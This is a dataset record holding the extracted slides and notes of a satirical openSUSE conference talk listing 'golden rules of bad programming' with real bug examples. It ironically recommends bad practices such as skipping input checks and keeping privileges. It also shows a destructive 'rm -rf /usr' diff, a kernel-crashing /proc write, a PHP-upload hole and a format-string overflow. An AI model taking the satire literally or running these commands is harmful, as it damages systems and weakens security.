id
stringlengths
40
40
text
stringlengths
9
86.7k
metadata
stringlengths
3k
16.2k
source
stringclasses
1 value
added
stringdate
2024-11-21 00:00:00
2024-12-12 00:00:00
created
stringdate
2024-11-21 00:00:00
2024-12-12 00:00:00
73fcfcc21715d70c41331ff52584dc7b4117da08
1001 bugs - or: the golden rules of bad programming Christian Boltz openSUSE beta tester, PostfixAdmin developer, battle-hardened AppArmorer, ... and: BBfH Never use any libraries or existing functions Re-inventing the wheel is fun! function myprint ($text) { $handle = fopen("/dev/stdout"); fput($handle, $text); } Photo: http://www.flickr.com/photos/vrogy/514733529/ Handle special values in a special way looks like you have some special code in yast for password "x", maybe I should use the even more secure new password "y" in the future?! ;-) [Harald Koenig, bnc#148464] Invent new ways to make your program slow while ( $current < $list['alias_count'] ) { $query = "SELECT $table_alias.address FROM $table_alias [...] LIMIT $current, 1"; $result = db_query ("$query"); $row = db_array ($result['result']); $tmpstr = $row['address']; $idxxlabel = $tmpstr[0] . $tmpstr[1]; // first two chars $current = $current + $page_size; $pagebrowser[] = $idxxlabel; } Invent new ways to make your program slow ```php $initcount = "SET @row=-1"; $result = db_query($initcount); # get labels for relevant rows (first and last of each page) $page_size_zerobase = $page_size - 1; $query = " SELECT * FROM ( SELECT $idxfield AS label, @row := @row + 1 AS row $querypart ) idx WHERE MOD(idx.row, $page_size_zerobase) IN (0,$page_size_zerobase) OR Idx.row = $count_results "; $result = db_query ($query); if ($result['rows'] > 0) { while ($row = db_array ($result['result'])) { # store all labels in an array } } Users hate error messages Conclusion: never print an error message. Fail silently instead. openSUSE developers seem to love this rule: • no error message when RPM database is missing (bnc#148105) • rcxdm doesn't start X in failsafe mode if xorg.conf.install was deleted (bnc#394316) kweather not installed – and now? > Hmm, what about looking out of the window? Outside of the window is another window, the desktop background or the border of the monitor. How exactly would that help? [full story: bnc#141107] Never drop any privileges ... you might need them later again - aa-notify broken on 11.4 because of missing permissions - might apply to real world also Make the UI easy to understand [bnc#21867] Make the UI easy to understand vi commands are quite easy to remember. Once you know what d w db de d) d( d} d{ dd d^ d$ dθ dG as well as cw and yw do, you'll also know what cb ce c) c( c} c{ cc c^ c$ cθ cG and yb ye y) y( y} y{ yy y^ y$ yθ yG do. [ Bernd Bordesser in suse-linux, translated ] Take great care in setting bad defaults zypper ar obs://home:cboltz home:cboltz always adds the Factory repo instead of the repo for the installed version. But there is a config option to hardcode the distribution in zypper.conf (and to have fun after upgrading the distribution) (/etc/SuSE-release anyone?) [bnc#648892] [wontfix, ENOTIME] It's enough to expect the usual data (cron.daily doesn't run because the system is on battery) Yes Karl, your machine has a battery! But no ac adapter :-) Unfortunately it is the battery in the BT Mouse and it won't be able to power your system for very long :-) [Stefan Seyfried, bnc#221999] It's enough to expect the usual data ```c #define IM_TEXT_LEN 32 char numstr[20]; char str[IM_TEXT_LEN]; sprintf(numstr, "%%2d%%%% %%.%ds", IM_TEXT_LEN-6); sprintf(str, numstr, (int)(percent * 100), graph->pairs[i]->name); ``` [modlogan, bnc#517602] It's enough to expect the usual data ```c #define IM_TEXT_LEN 32 char numstr[20]; char str[IM_TEXT_LEN]; sprintf(numstr, "%2d%%% %%.%ds", IMTextUtils_LEN-6); # numstr = "%2d%% %.27s" sprintf(str, numstr, (int)(percent * 100), graph->pairs[i]->name); ``` [modlogon, bnc#517602] Never make your code reusable ... especially if it has more than 1000 lines Reusing pieces of code is like picking off sentences from other people's stories and trying to make a magazine article. [Bob Frankston] Besides that: Nobody needs that much code a second time ;(-) Make ALL your code reuseable (including each and every little script you write) bad: ```bash echo "Hello World!"; ``` Make ALL your code reusable good: ```perl Class HelloWorld { my $greeting = "Hello World!"; function setGreet($newGreeting) { $greeting = $newGreeting; } function greet() { echo $greeting; } } $greeter = new HelloWorld; # default text is fine $greeter->greet; ``` Make ALL your code reuseable This will save you lots of work in the future. You can then just do: ```php $greeter = new HelloWorld; $greeter->setGreet("Hello openSUSE!"); $greeter->greet; ``` Make ALL your code reuseable This will save you lots of work in the future. You can then just do: ```php $greeter = new HelloWorld; $greeter->setGreet("Hello openSUSE!"); $greeter->greet; ``` That's easier than ```php echo "Hello openSUSE!"; ``` Don't use small if blocks. Use cp instead. cp edit-mailbox.php admin/edit-mailbox.php vi admin/edit-mailbox.php # remove permission checks diff edit-mailbox.php admin/edit-mailbox.php | wc -l 15 ... 5 years later ... diff edit-mailbox.php admin/edit-mailbox.php | wc -l 250 Don't use small if blocks. Use cp instead. Boring: [Unit] Description=Daemon to detect crashing apps After=syslog.target [Service] ExecStart=/usr/sbin/abra td Type=forking [Install] WantedBy=multi-user.target Don't use small if blocks. Use cp instead. Also boring: CPAN_service in the buildservice That would make it too obvious that you are a lazybone as packager and just use a template-based specfile. It's much more maintenance fun to checkin the cpanspec-generated specfiles. Always trust your users or: never check user input Even AppArmor followed this rule, so it can't be too wrong ;-) ``` echo 'AAA AAA' > /proc/$$/attr/current Segmentation fault ``` [107353.169142] kernel BUG at kernel BUG at [107353.169159] invalid opcode: 0000 [#7] SMP [...] [https://bugs.launchpad.net/bugs/789409] Always trust your users or: never check user input Select the photo you want to use as avatar /home/evil/mynphoto.php Upload http://server/wbb/images/avatars/myphoto.php will give the admin some fun... [Woltlab burning board 1.0.2] Always trust your users or: never check user input The input you may expect will be completely unrelated to the input given by a disgruntled employee, a cracker with months of time on their hands, or a housecat walking across the keyboard. Always trust your users or: never check user input [http://xkcd.com/327/] Always check for errors Especially if you write a library. It isn't trivial to write correct code: ```c exit(-1); syslog(LOG_ERROR, "Can't exit.\n"); ``` [Lutz Donnerhacke in dclp, translated] Never think about error handling Just expect your code to work. - error handling is only boring programming work, it's much more exciting to fix bugs after deploying the software on production-critical systems - better invest your time in developing new features - thinking about errors is the job of bugreporters anyway Bugzilla speed with Coolo > Status? NEW [Ihno Krumreich and Stephan Kulow, bnc#159223] > which camera is this? Marcus, this is my bug :) [Marcus Meissner and Stephan Kulow, bnc#217731] Never expect someone will use your software Hardcoding your username is fine. > mkdir: Can't create directory »»/home/ratti«« > Looks like you should use ~ instead of > /home/ratti ;-) Wait and see – 0.0.3 will even work if your name is not “ratti” ;-) Never expect someone will use your software Never remove any debugging code (at least until someone forces you to do it) mcelog should NOT email trenn@suse.de by default [bnc#713562] Never expect someone will use your software Hello everybody out there using minix - I'm doing a (free) operating system (just a hobby, won't be big and professional like gnu) for 386(486) AT clones. This has been brewing since april, and is starting to get ready. I'd like any feedback on things people like/dislike in minix, as my OS resembles it somewhat (same physical layout of the file-system (due to practical reasons) among other things). [Linus Torvalds, August 1991] Nest your code as deep as possible ```php if ($name == "foo") { if ($value == "bar") { if ($number > 0) { if ($flags == "baz") { # 1000 lines of code } else { die ("invalid flag"); } } else { die ("invalid number"); } } else { die ("invalid value"); } } else { die ("invalid name"); } ``` Never do something like this: ```php if ($name != "foo") { die("invalid name"); } ``` ```php if ($value != "bar") { die ("invalid value"); } ``` ```php if ($number <= 0) { die("invalid number"); } ``` ```php if ($flags != "baz") { die ("invalid flag"); } ``` # 1000 lines of code Offer some brain training for your users ```bash # zypper ar --help |grep refresh -f, --refresh Enable autorefresh of the repository. # zypper mr --help |grep refresh -r, --refresh Enable auto-refresh of the repository. ``` Ignore compiler and rpmlint warnings • real problems cause errors, not warnings • conclusion: warnings are not a problem Never submit your patches upstream Keeping the patches in your package is fun: • you look like a professional if you can handle 50 patches in a package • you save upstream some work on reviewing and integrating the patches • you always have some fun when updating the package and your patches to the next version Never write any documentation - if some old documentation exists, never update it - nobody reads documentation anyways - comments in the code also count as documentation – avoid adding them whenever possible Never write any documentation • nobody reads documentation anyways Really? I've been doing this 10.1 test work just like a real user: In other words I never read any release notes or documentation :-) [tomhorsley(at)adelphia.net in opensuse-factory] Never write any documentation - nobody reads documentation anyways Really? Beware of the paperclips! [bnc#65000] Never trust a bugreporter > > RESOLVED INVALID > Henne, did you actually test this before closing > the bug as invalid? of course i did not test it. do you think i'm bored? [bnc#420972] Never trust a bugreporter general rule: if Olaf reports a bug, it is a valid bug. (Olaf Hering while reopening bnc#168595) NEEDINFO fun I am supposed to be the info provider, so here is my answer: 42 By the way: What is the question? [Johannes Meixner, bnc#190173] Never test small changes switch2nvidia: * fixed disabling Composite extension; script replaced "Option" with "Optioff" :-( [commit message by Stefan Dirsch] KMS_IN_INITRD="noyes" [sed result, bnc#619218] -ao=pulse,alsa +,alsa [setup-pulseaudio fun, bnc#681113] Quoting in shell scripts is overestimated @@ -352,1 +352,1 @@ - rm -rf /usr /lib/nvidia-current/xorg/xorg + rm -rf /usr/lib/nvidia-current/xorg/xorg Probably the most-commented commit on github. https://github.com/MrMEEE/bumblebee/commit/a047be Hey, this makes you famous! ;-} Wine developers prefer beer Marcus Meissner told me at the openSUSE conference last october that most wine developers actually prefer beer. He also repeated this statement in the slides for today's "wine is not (only) an emulator" talk he's giving at LinuxTag together with me. It must be a bug that wine developers prefer beer! Proposed fix: for person in developers/* ; do sed -i 's/Prefer: beer/Prefer: wine/' done and the winner is... Make your code easy to understand #!/usr/bin/perl ``` # Make your code easy to understand ``` © September 27, 2011 Christian Boltz special rule for openSUSE: special rule for openSUSE: Always code as if the guy who ends up maintaining your code will be a violent psychopath who knows where you live. [John F. Woods] Thanks! - everybody who accidently ;-) contributed to my talk - for the inspiration by http://www.karzauninkat.com/Goldhtml/ “golden rules of bad HTML” (german) http://www.sapdesignguild.org/community/design/golden_rules.asp “golden rules for bad user interfaces” http://blog.koehntopp.de/archives/2127-The-Importance-Of-FAIL.html http://blog.koehntopp.de/archives/2611-Was-bedeutet-eigentlich- Never-check-for-an-error-condition-you-dont-know-how-to-handle.html two great articles about FAIL by Kris Köhntopp - perl Acme::EyeDrops for rendering rule #1 - for listening Questions? Opinions? Flames? You'll find lots of books telling you how to write good code. That's nice and maybe even useful, but boring ;-) My talk will give you something more inspiring: the golden rules of bad programming. BTW: I have no idea why rules have to be golden, but I won't break this tradition. Never use any libraries or existing functions Re-inventing the wheel is fun! ```php function myprint ($text) { $handle = fopen("/dev/stdout"); fputs($handle, $text); } ``` Using existent libraries is evil. Think of dependencies and bigger installed size if you use lots of libraries – do you really want that? I have to admit that the example is very extreme, but I also have an example from practise – parsing commandline options. You might think “hey, I only need to handle two options” - no need for a library. That's also what happened in one of this year's GSoC projects. Sooner or later, you add more commandline switches, some of them accept options and so on. Sooner or later you have to switch to getopts that already provides all the details you need. Handle special values in a special way looks like you have some special code in yast for password "x", maybe I should use the even more secure new password "y" in the future ?! ;-) [Harald Koenig, bnc#148464] YaST had some special code that locked a newly created user if you give him password 'x'. There are more examples where special values were handled in a special way. Think of all the y2k bugs where the year zero was handled in a funny way. And Linux will get a similar problem in 2038 when the unix time (seconds since 1970) doesn't fit in a 32bit variable anymore. I doubt someone will still use 32bit systems by then, but nevertheless the problem might be embedded in data structures, file formats and in embedded devices like machine control units. Invent new ways to make your program slow while ( $current < $list['alias_count'] ) { $query = "SELECT $table_alias.address FROM $table_alias [...] LIMIT $current, 1"; $result = db_query ("$query"); $row = db_array ($result['result']); $tmpstr = $row['address']; $idxlabel = $tmpstr[0] . $tmpstr[1]; // first two chars $current = $current + $page_size; $pagebrowser[] =$idxlabel; } A very good way to make a program slow is to do SQL queries in a loop. The above code is a shortened snippet from PostfixAdmin 2.3 to generate the pagebrowser (you know – the “a-c, d-f, g-k” links) in the listing of mail addresses. The code on the slide only fetches the starting point of each page, the original code fetches start and end point, which doubles the number of queries. Following this rule worked quite well – with 1000 pages of mail addresses, it took 10 minutes until the pagebrowser was generated. And, very strange, there were even some users that complained about the loading time of that page... Invent new ways to make your program slow ```php $initcount = "SET @row=-1"; $result = db_query($initcount); # get labels for relevant rows (first and last of each page) $page_size_zerobase = $page_size - 1; $query = " SELECT * FROM ( SELECT $idxfield AS label, @row := @row + 1 AS row $querypart ) idx WHERE MOD(idx.row, $page_size_zerobase) OR idx.row = $count_results "; $result = db_query ($query); if ($result['rows'] > 0) { while ($row = db_array ($result['result'])) { # store all labels in an array } } ``` Now here's what you should never do if you want to see your CPU busy: Let MySQL count over the rows and just get the relevant lines with one big query. The downside is that this doesn't work with postgresql – if someone knows a similar working solution for postgresql, please tell me after the talk. Oh, and while we are talking about databases: There's also the good old and simple way to make your program slow – don't add an index to your tables. This small detail can already make your queries 100 times slower. Users hate error messages Conclusion: never print an error message. Fail silently instead. openSUSE developers seem to love this rule: - no error message when RPM database is missing (bnc#148105) - rcxdm doesn't start X in failsafe mode if xorg.conf.install was deleted (bnc#394316) That's the hardest type of bugreports – trying to explain a developer that you want to see an error message added. Usually they'll explain you why the thing you are doing can't work and that it's impossible to add working code for that case, which is usually a corner case. About 5 reopens later, they finally understand that all you want is an additional error message, which is what was already stated in the initial bugreport. Sometimes the developers in the SUSE office have really difficult problems to solve. One day Marcus noticed that kweather was not installed by default, and I proposed to look out of the window. Rasmus Plewe tried this, but not too successful. Never drop any privileges ... you might need them later again - aa-notify broken on 11.4 because of missing permissions - might apply to real world also aa-notify is part of AppArmor and can be used to display desktop notifications when a program violates the AppArmor policy. By dropping permissions, it lost the ability to read /var/log/audit/ Funnily, it somehow followed the “never drop any privileges” rule and didn't drop the group permissions. This means it was able to access the /var/log/audit/ directory with its group permissions on Ubuntu, but not on openSUSE because of stricter permissions. That's the funny thing – sometimes two bugs neutralize each other. At least until someone like me comes and has a too strict permission set to make the group permission bug working. Now guess what happens if you click continue. The answer is: YaST continues to cancel the installation – or, translated for the confused listeners: continue cancels the installation. If you click cancel, the installation will continue. Buttons named “yes” and “no” might be a better idea in such cases. Make the UI easy to understand vi commands are quite easy to remember. Once you know what `dw db de d) d{ dd d^ d$ dθ dG` as well as `cw` and `yw` do, you'll also know what `cb ce c) c{ cc c^ c$ cθ cG` and `yb ye y) y{ yy y^ y$ yθ yG` do. [Bernd Bordesser in suse-linux, translated] This example speaks for itself – vim is really easy to use Take great care in setting bad defaults zypper ar obs://home:cboltz home:cboltz always adds the Factory repo instead of the repo for the installed version. But there is a config option to hardcode the distribution in zypper.conf (and to have fun after upgrading the distribution) (/etc/SuSE-release anyone?) [bnc#648892] [wontfix, ENOTIME] It's enough to expect the usual data cron.daily doesn't run because the system is on battery Yes Karl, your machine has a battery! But no ac adapter :-) Unfortunately it is the battery in the BT Mouse and it won't be able to power your system for very long :-) [Stefan Seyfried, bnc#221999] Here's a nice format string example from modlogan – who can tell me what it does? First it generates the formatstring numstr: numstr: %2d → 2 digits from (int)(percent*100) “%%” → “%“ + space (2 byte) %.27s → 27 chars string with dots as fillers total: 31 bytes And the even more interesting question: Why/how can it cause a buffer overflow? Answer: with only one line in the log (in other words: only one client, only one browser type), you'll get 100%. That's 3 digits and makes the string one byte longer – 32 byte total, no space left for the null byte at the end Here's a nice format string example from modlogan – who can tell me what it does? First it generates the formatstring numstr: - numstr: `%2d` → 2 digits from `(int)(percent*100)` - `%%` → `'%'` + space (2 byte) - `%.27s` → 27 chars string with dots as fillers Total: 31 bytes And the even more interesting question: Why/how can it cause a buffer overflow? Answer: with only one line in the log (in other words: only one client, only one browser type), you'll get 100%. That's 3 digits and makes the string one byte longer – 32 byte total, no space left for the null byte at the end Never make your code reusable ... especially if it has more than 1000 lines Reusing pieces of code is like picking off sentences from other people's stories and trying to make a magazine article. [Bob Frankston] Besides that: Nobody needs that much code a second time ;-) Make ALL your code reuseable (including each and every little script you write) bad: ``` echo "Hello World!"; ``` That's bad code because it is not reuseable Let's make it better... Make ALL your code reuseable good: Class HelloWorld { my $greeting = "Hello World!"; function setGreet($newGreeting) { $greeting = $newGreeting; } function greet() { echo $greeting; } } $greeter = new HelloWorld; # default text is fine $greeter->greet; Here's the good code: - the greeting text is in a variable – the code is flexible enough to work with different texts - everything is encapsulated in a class – no internals are visible to the outside - and, most important: it's reuseable Make ALL your code reuseable This will save you lots of work in the future. You can then just do: ```php $greeter = new HelloWorld; $greeter->setGreet("Hello openSUSE!"); $greeter->greet; ``` See how much work reuseable code can save you in the future. Just create an instance of the class, set the text you want and let it print its greeting. And, most important... Make ALL your code re-useable This will save you lots of work in the future. You can then just do: ```php $greeter = new HelloWorld; $greeter->setGreet("Hello openSUSE!"); $greeter->greet; ``` That's easier than ``` echo "Hello openSUSE!"; ``` … that's much easier than using code you can't re-use ;-) In practise, the way to go is somewhere between this and the previous rule – big programs should have units of re-useable code wherever it makes sense. OTOH, it doesn't make sense to make everything re-useable, as the “hello world” example showed. Usually a pragmatic approach is the best choice – do what you think is the best Don't use small if blocks. Use cp instead. ```bash cp edit-mailbox.php admin/edit-mailbox.php vi admin/edit-mailbox.php # remove permission checks diff edit-mailbox.php admin/edit-mailbox.php | wc -l 15 ... 5 years later ... diff edit-mailbox.php admin/edit-mailbox.php | wc -l 250 ``` This is a real-world example from PostfixAdmin, however the numbers are just a not-so-wild guess. Several years ago, edit-mailbox (for admins that have permissions only for some domains) and admin/edit-mailbox (for superadmins, think “root”) had the same code, with the only exception that the superadmin code did not check for domain permissions. Over the years, several changes and bugfixes were done – but only in one copy of the code. The result was that several copies of nearly the same code existed, but each copy came with a different set of bugs. That's what I found when I started working on PostfixAdmin in 2007. Since then I'm more or less doing code cleanup and remove duplicated code. But yes, we also introduced some new cool features. Don't use small if blocks. Use cp instead. Boring: [Unit] Description=Daemon to detect crashing apps After=syslog.target [Service] ExecStart=/usr/sbin/abrt type=forking [Install] WantedBy=multi-user.target A more openSUSE-related example are initscripts. You all know how long the old-style initscripts are, and if you compare them, you'll find out that 80 or 90% of the code is the same in all initscripts. Now compare that to the systemd unit files. In short: the systemd unit files are ways too short, boring and too easy to maintain. Don't use small if blocks. Use cp instead. Also boring: CPAN_service in the buildservice That would make it too obvious that you are a lazybone as packager and just use a template-based specfile. It's much more maintenance fun to checkin the cpanspec-generated specfiles. Even more openSUSE-related: Source services in the buildservice. In general they are a good idea (or at least would be if they work) For example the cpanspec service would make it much easier to package 90% of the perl packages. However, that would make it too obvious that you are a lazybone as packager and just use template-based specfiles. Checking in the cpanspec-generated specfile will give you much more maintenance fun. When you update the package, you have the choice of a) edit the version number in the specfile and hope that everything else continues to work b) run cpanspec to recreate the specfile and hope that it didn't have to use an additional parameter to cpanspec that you don't remember My personal solution is to checkin a “run-cpanspec.sh” script in my packages. And it's even funnier to discuss this with yaloki and darix who both hate source services ;-) Always trust your users or: never check user input Even AppArmor followed this rule, so it can't be too wrong ;-) ```bash echo 'AAA AAA' > /proc/$$/attr/current Segmentation fault ``` [107353.169142] kernel BUG at kernel BUG at /usr/src/packages/BUILD/kernel-desktop- 2.6.37.6/linux-2.6.37/security/apparmor/audit.c:183! [107353.169159] invalid opcode: 0000 [#7] SMP […] [https://bugs.launchpad.net/bugs/789409] Always trust your users or: never check user input Select the photo you want to use as avatar /home/evil/myphoto.php http://server/wbb/images/avatars/myphoto.php will give the admin some fun... [Woltlab burning board 1.0.2] Real-world case: a customer's forum software allowed to upload any file as avatar. Including PHP scripts... BTW: The next version fixed the upload vulnerability, but allowed to download any file the webserver could read – including PHP files with database passwords and /etc/passwd I'd say the PHP security team isn't too wrong. They say... Always trust your users or: never check user input The input you may expect will be completely unrelated to the input given by a disgruntled employee, a cracker with months of time on their hands, or a housecat walking across the keyboard. … but this rule wouldn't be complete without little bobby tables… Always trust your users or: never check user input [http://xkcd.com/327/] © September 27, 2011 Christian Boltz Always check for errors Especially if you write a library. It isn't trivial to write correct code: ```c exit(-1); syslog(LOG_ERROR, "Can't exit. "); ``` [Lutz Donnerhacke in dclp, translated] This rule is especially valid if you write a library. For example, there could be a failure in allocating memory. What do you do? There might be cases where you don't know how an error should be handled. In that case, it's indeed better to forward the error to the calling application instead of handling it yourself in a way that breaks the application. Please forward all details of the error – telling the application “something didn't work” isn't really helpful. Back to the memory allocation failure: The library can't simply exit with an error message – that would also exit the calling program in an undefined state. the only solution I'd accept in a library is that it does a quick online order for _free_ memory modules. Or, more seriously, tell the calling application “memory allocation failure” and hope that it will handle this error in a sane way. So the conclusion is... Never think about error handling Just expect your code to work. - error handling is only boring programming work, it's much more exciting to fix bugs after deploying the software on production-critical systems - better invest your time in developing new features - thinking about errors is the job of bugreporters anyway Bugzilla speed with Coolo > Status? NEW [Ihno Krumreich and Stephan Kulow, bnc#159223] > which camera is this? Marcus, this is my bug :) [Marcus Meissner and Stephan Kulow, bnc#217731] Before we come to the top 10, here's some bugzilla speed comparison with Coolo. Never expect someone will use your software Hardcoding your username is fine. > mkdir: Can't create directory »»/home/ratti«« > Looks like you should use ~ instead of > /home/ratti ;-) Wait and see – 0.0.3 will even work if your name is not “ratti” ;-) Never expect someone will use your software Never remove any debugging code (at least until someone forces you to do it) mcelog should NOT email trenn@suse.de by default [bnc#713562] You probably have seen the online update to fix this bugreport some weeks ago ... and finally the most prominent example of a person who never expected that his software would be used by anyone... Never expect someone will use your software Hello everybody out there using minix - I'm doing a (free) operating system (just a hobby, won't be big and professional like gnu) for 386(486) AT clones. This has been brewing since april, and is starting to get ready. I'd like any feedback on things people like/dislike in minix, as my OS resembles it somewhat (same physical layout of the file-system (due to practical reasons) among other things). [Linus Torwalds, August 1991] Nest your code as deep as possible ```php if ($name == "foo") { if ($value == "bar") { if ($number > 0) { if ($flags == "baz") { # 1000 lines of code } else { die ("invalid flag"); } } else { die ("invalid number"); } } else { die ("invalid value"); } } else { die ("invalid name"); } ``` Never do something like this: ```php if ($name != "foo") { die("invalid name"); } else if ($value != "bar") { die ("invalid value"); } else if ($number <= 0) { die ("invalid number"); } else if ($flags != "baz") { die ("invalid flag"); } ``` Offer some brain training for your users # zypper ar --help |grep refresh -f, --refresh Enable autorefresh of the repository. # zypper mr --help |grep refresh -r, --refresh Enable auto-refresh of the repository. [bnc#661410] it would be too boring if the same short option would work for both, right? Ignore compiler and rpmlint warnings - real problems cause errors, not warnings - conclusion: warnings are not a problem examples: - uninitialized variables can't be real. The memory is always full, therefore the variable must have some content - and it will never happen that you mistyped the variable name. Never submit your patches upstream Keeping the patches in your package is fun: - you look like a professional if you can handle 50 patches in a package - you save upstream some work on reviewing and integrating the patches - you always have some fun when updating the package and your patches to the next version This slide is dedicated to the AppArmor package, but probably applies to lots of packages. I'd say the AppArmor package looks quote professional with 24 patches And I can confirm that upstreaming the patches causes some review work for upstream – I submitted most of the AppArmor patches upstream, and it took them some days until they turned up from my patch flood again. The result is that as soon as someone updates the AppArmor package to 2.7 beta, less than 10 patches will be left. That someone might even be me, but unfortunately one of the patches is 370 kB big and doesn't have a real chance to be accepted upstream. Final reason not to upstream patches: The openSUSE package should always be better than the packages in other distributions, and having some important patches others don't have indeed makes the package better. Never write any documentation - if some old documentation exists, never update it - nobody reads documentation anyways - comments in the code also count as documentation – avoid adding them whenever possible Never write any documentation - nobody reads documentation anyways Really? I've been doing this 10.1 test work just like a real user: In other words I never read any release notes or documentation :-) [tomhorsley(at)adelphia.net in opensuse-factory] Well, most users don't read the documentation. But it might happen that the BBfH strikes out again Never write any documentation - nobody reads documentation anyways Really? Beware of the paperclips! [bnc#65000] Some people might remember the printed manuals from the good old time. Here's one of them. Each paperclip marks a bug in the “shell” chapter of the manual. This results in a bugreport that is about 3 printed pages long. First bugzilla comment: @bugreporter: please do not ever touch a paperclip again ... :) Never trust a bugreporter > > RESOLVED INVALID > Henne, did you actually test this before closing > the bug as invalid? of course i did not test it. do you think i'm bored? [bnr#420972] Bug reporters are evil, you remember? They steal your time by reporting defects and expect them to be fixed. By YOU, of course. And even worse, if you try to get rid of them by closing a bug as invalid, they reopen it... In this case it was a regression in the courier-imap initscript. Needless to say that the bugreport was valid... general rule: if Olaf reports a bug, it is a valid bug. (Olaf Hering while reopening bnc#168595) NEEDINFO fun I am supposed to be the info provider, so here is my answer: 42 By the way: What is the question? [Johannes Meixner, bnc#190173] Never test small changes switch2nvidia: * fixed disabling Composite extension; script replaced "Option" with "Optioff" :-( [commit message by Stefan Dirsch] KMS_IN_INITRD="noyes" [sed result, bnc#619218] -ao=pulse,alsa +,alsa [setup-pulseaudio fun, bnc#681113] valid for changes and scripts up to 200 lines ;-) You'll probably find lots of similar examples, but those are the most interesting ones I could find. First the “optioff” - but it worked and successfully disabled the composite extension In the second example, sed couldn't decide and finally put in “noyes” so that everyone is happy. And finally setup-pulseaudio broke the mplayer config file. Additionally mplayer didn't report in which file the error was, which meant some fun until I had found out what happened. Quoting in shell scripts is overestimated @@ -352,1 +352,1 @@ - rm -rf /usr /lib/nvidia-current/xorg/xorg + rm -rf /usr/lib/nvidia-current/xorg/xorg Probably the most-commented commit on github. https://github.com/MrMEEE/bumblebee/commit/a047be Hey, this makes you famous! ;-) Wine developers prefer beer Marcus Meissner told me at the openSUSE conference last October that most wine developers actually prefer beer. He also repeated this statement in the slides for today's "wine is not (only) an emulator" talk he's giving at LinuxTag together with me. It must be a bug that wine developers prefer beer! Proposed fix: ```bash for person in developers/*/ do sed -i 's/Prefer: beer/Prefer: wine/' done ``` and the winner is... Ladies and gentlemen, here is number one of the golden rules of bad programming. *** drum roll *** Make your code easy to understand I think this code speaks for itself. I'll pay a glass of wine for the first person who tells me what this little program does. Yes, it is valid perl code. There is one special rule for openSUSE, and it might be more important than the other rules I told you: There is one special rule for openSUSE, and it might be more important than the other rules I told you: special rule for openSUSE: Always code as if the guy who ends up maintaining your code will be a violent psychopath who knows where you live. [John F. Woods] Thanks! - everybody who accidently ;-) contributed to my talk - for the inspiration by http://www.karzauninkat.com/Goldhtml/ “golden rules of bad HTML” (german) http://www.sapdesignguild.org/community/design/golden_rules.asp “golden rules for bad user interfaces” http://blog.koehntopp.de/archives/2127-The-Importance-Of-FAIL.html http://blog.koehntopp.de/archives/2611-Was-bedeutet-eigentlich- Never-check-for-an-error-condition-you-dont-know-how-to-handle.html two great articles about FAIL by Kris Köhntopp - perl Acme::EyeDrops for rendering rule #1 - for listening Questions? Opinions? Flames?
{"Source-Url": "https://blog.cboltz.de/uploads/1001-bugs-or-golden-rules-of-bad-programming.pdf", "len_cl100k_base": 9346, "olmocr-version": "0.1.50", "pdf-total-pages": 102, "total-fallback-pages": 0, "total-input-tokens": 143057, "total-output-tokens": 13746, "length": "2e13", "weborganizer": {"__label__adult": 0.0003390312194824219, "__label__art_design": 0.0003407001495361328, "__label__crime_law": 0.00021958351135253904, "__label__education_jobs": 0.00043845176696777344, "__label__entertainment": 7.420778274536133e-05, "__label__fashion_beauty": 8.529424667358398e-05, "__label__finance_business": 0.00013697147369384766, "__label__food_dining": 0.0002646446228027344, "__label__games": 0.00039458274841308594, "__label__hardware": 0.00038909912109375, "__label__health": 0.00014829635620117188, "__label__history": 0.00010919570922851562, "__label__home_hobbies": 6.93202018737793e-05, "__label__industrial": 0.00012993812561035156, "__label__literature": 0.00016236305236816406, "__label__politics": 0.00013756752014160156, "__label__religion": 0.00026917457580566406, "__label__science_tech": 0.0007748603820800781, "__label__social_life": 0.00010287761688232422, "__label__software": 0.006137847900390625, "__label__software_dev": 0.98876953125, "__label__sports_fitness": 0.00015044212341308594, "__label__transportation": 0.00016868114471435547, "__label__travel": 0.00012791156768798828}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 36878, 0.0271]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 36878, 0.18748]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 36878, 0.87945]], "google_gemma-3-12b-it_contains_pii": [[0, 157, false], [157, 381, null], [381, 591, null], [591, 1021, null], [1021, 1608, null], [1608, 1893, null], [1893, 2122, null], [2122, 2277, null], [2277, 2321, null], [2321, 2617, null], [2617, 2961, null], [2961, 3260, null], [3260, 3521, null], [3521, 3800, null], [3800, 4076, null], [4076, 4197, null], [4197, 4499, null], [4499, 4693, null], [4693, 4943, null], [4943, 5221, null], [5221, 5434, null], [5434, 5708, null], [5708, 6121, null], [6121, 6358, null], [6358, 6652, null], [6652, 6727, null], [6727, 6924, null], [6924, 7247, null], [7247, 7434, null], [7434, 7692, null], [7692, 7878, null], [7878, 8357, null], [8357, 9077, null], [9077, 9306, null], [9306, 9428, null], [9428, 9743, null], [9743, 9952, null], [9952, 10207, null], [10207, 10323, null], [10323, 10511, null], [10511, 10635, null], [10635, 10781, null], [10781, 11047, null], [11047, 11329, null], [11329, 11755, null], [11755, 11776, null], [11776, 11912, null], [11912, 11939, null], [11939, 12099, null], [12099, 12686, null], [12686, 12715, null], [12715, 12996, null], [12996, 13772, null], [13772, 14540, null], [14540, 15581, null], [15581, 16649, null], [16649, 17367, null], [17367, 17612, null], [17612, 18405, null], [18405, 18708, null], [18708, 19053, null], [19053, 19397, null], [19397, 19691, null], [19691, 20262, null], [20262, 20849, null], [20849, 21124, null], [21124, 21315, null], [21315, 21844, null], [21844, 22215, null], [22215, 22853, null], [22853, 23900, null], [23900, 24444, null], [24444, 25600, null], [25600, 26016, null], [26016, 26587, null], [26587, 26948, null], [26948, 27061, null], [27061, 28150, null], [28150, 28473, null], [28473, 28743, null], [28743, 29000, null], [29000, 29385, null], [29385, 29864, null], [29864, 30542, null], [30542, 30852, null], [30852, 31163, null], [31163, 32319, null], [32319, 32528, null], [32528, 32881, null], [32881, 33310, null], [33310, 33837, null], [33837, 33934, null], [33934, 34080, null], [34080, 34865, null], [34865, 35145, null], [35145, 35582, null], [35582, 35704, null], [35704, 35894, null], [35894, 35998, null], [35998, 36263, null], [36263, 36850, null], [36850, 36878, null]], "google_gemma-3-12b-it_is_public_document": [[0, 157, true], [157, 381, null], [381, 591, null], [591, 1021, null], [1021, 1608, null], [1608, 1893, null], [1893, 2122, null], [2122, 2277, null], [2277, 2321, null], [2321, 2617, null], [2617, 2961, null], [2961, 3260, null], [3260, 3521, null], [3521, 3800, null], [3800, 4076, null], 